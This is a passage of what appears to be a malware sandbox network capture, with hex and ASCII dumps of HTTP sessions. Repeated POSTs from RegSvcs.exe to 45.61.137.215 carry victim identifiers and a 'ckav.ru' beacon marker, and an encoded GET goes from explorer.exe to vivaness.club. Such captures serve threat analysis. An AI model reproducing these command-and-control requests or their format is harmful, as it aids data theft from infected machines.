                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:25.290452957 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:25.290463924 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:25.290474892 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:25.290487051 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:25.290640116 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:25.290649891 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.94974345.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:25.482919931 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:25.490550041 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:28.043178082 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:26 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:28.043205023 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:28.043215990 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:28.043226004 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:43:28.043237925 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:43:28.043246031 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:43:28.043256998 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:28.043267012 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:28.043277979 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:28.043410063 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.949744103.224.212.213803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:27.019236088 CEST171OUTGET /dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1
                                            Host: www.vivaness.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.94974545.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:28.214472055 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:28.219433069 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:30.643383026 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:28 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:30.643404007 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:30.643414974 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:30.643425941 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:30.643436909 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:30.643448114 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:43:30.643461943 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:43:30.643471956 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                                            Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:43:30.643481970 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:30.643495083 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.94974645.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:30.801731110 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:30.806689024 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:33.221050024 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:31 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
